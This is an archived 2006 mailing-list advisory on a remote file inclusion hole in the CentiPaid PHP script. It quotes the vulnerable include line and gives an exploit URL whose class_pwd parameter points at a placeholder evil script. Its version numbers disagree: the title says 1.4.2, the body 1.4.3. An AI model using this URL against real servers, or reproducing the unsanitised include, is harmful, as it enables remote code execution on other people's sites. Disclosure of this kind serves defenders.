|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
CentiPaid <= 1.4.2 [$class_pwd] Remote File Include
firewall1954
hotmail.com
Date: Sat Oct 28 2006 - 01:49:57 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Affected software description :
Application : CentiPaid
version : 1.4.3
URL : http://www.centipaid.com/centi/download/centipaid_php-1.4.3.tar.gz
Code:centipaid_class.php
include($class_pwd.'/adodb/adodb.inc.php')
Exploit:
http://www.site.com/[path]/centipaid_class.php?class_pwd=[Evil_Script]
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]